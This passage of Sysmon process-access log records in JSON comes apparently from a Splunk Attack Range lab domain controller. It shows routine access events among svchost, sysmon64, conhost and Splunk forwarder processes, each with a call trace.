C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.286\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-00103BD30500}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.286","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-00103BD30500}","TargetProcessId":"1196","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.427\r\nSourceProcessGUID: {41C8662E-1FFF-5F25-0000-00103BD30500}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1180\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.427","SourceProcessGUID":"{41C8662E-1FFF-5F25-0000-00103BD30500}","SourceProcessId":"1196","SourceThreadId":"1180","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program 